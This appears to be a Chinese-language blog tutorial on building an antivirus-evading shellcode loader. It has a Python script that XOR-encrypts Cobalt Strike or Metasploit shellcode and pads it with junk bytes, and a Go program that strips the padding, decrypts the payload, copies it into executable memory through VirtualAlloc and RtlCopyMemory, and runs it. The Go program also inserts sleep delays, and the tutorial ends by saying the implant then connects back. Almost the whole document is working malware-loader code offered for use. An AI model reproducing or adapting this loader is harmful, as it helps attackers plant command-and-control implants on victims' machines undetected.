go语言环境搭建
Golang学习日志 ━━ 下载及安装_golang下载-CSDN博客
go run xxx.go
go build xxx.go
首先,cs.msf生成比特流数据.
放入xor,py脚本中进行xor加密.
xor.py
def xor(shellcode, key):
new_shellcode = ""
key_len = len(key)
# 对shellcode的每一位进行xor亦或处理
for i in range(0, len(shellcode)):
s = ord(shellcode[i])
p = ord((key[i % key_len]))
s = s ^ p # 与p异或,p就是key中的字符之一
s = chr(s)
new_shellcode += s
return new_shellcode
def random_decode(shellcode):
j = 0
new_shellcode = ""
for i in range(0,len(shellcode)):
if i % 2 == 0:
new_shellcode[i] = shellcode[j]
j += 1
return new_shellcode
def add_random_code(shellcode, key):
new_shellcode = ""
key_len = len(key)
# 每个字节后面添加随机一个字节,随机字符来源于key
for i in range(0, len(shellcode)):
#print(ord(shellcode[i]))
new_shellcode += shellcode[i]
# print("&"+hex(ord(new_shellcode[i])))
new_shellcode += key[i % key_len]
#print(i % key_len)
return new_shellcode
# 将shellcode打印输出
def str_to_hex(shellcode):
raw = ""
for i in range(0, len(shellcode)):
s = hex(ord(shellcode[i])).replace("0x",',0x')
raw = raw + s
return raw
if __name__ == '__main__':
shellcode=" 比特流shellcode!!!!! "
# 这是异或和增加随机字符使用的key
key = "iqe"
#print(shellcode[0])
#print(len(shellcode))
# 首先对shellcode进行异或处理
shellcode = xor(shellcode, key)
#print(len(shellcode))
# 然后在shellcode中增加随机字符
shellcode = add_random_code(shellcode, key)
# 将shellcode打印出来
print(str_to_hex(shellcode))
xor_dec.go
package main
import (
"syscall"
"time"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func main() {
mix_shellcode := []byte{ xor加密后的shellcode !!!!!! }
var ttyolller []byte
key := []byte("iqe")
var key_size = len(key)
var shellcode_final []byte
var j = 0
time.Sleep(2)
// 去除垃圾代码
//fmt.Print(len(mix_shellcode))
for i := 0; i < len(mix_shellcode); i++ {
if i%2 == 0 {
shellcode_final = append(shellcode_final, mix_shellcode[i])
j += 1
}
}
time.Sleep(3)
//fmt.Print(shellcode_final)
// 解密异或
for i := 0; i < len(shellcode_final); i++ {
ttyolller = append(ttyolller, shellcode_final[i]^key[i%key_size])
}
time.Sleep(3)
addr, _, err := VirtualAlloc.Call(0, uintptr(len(ttyolller)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
time.Sleep(3)
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&ttyolller[0])), uintptr(len(ttyolller)))
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
syscall.Syscall(addr, 0, 0, 0, 0)
}
运行xor_dec.go --->上线.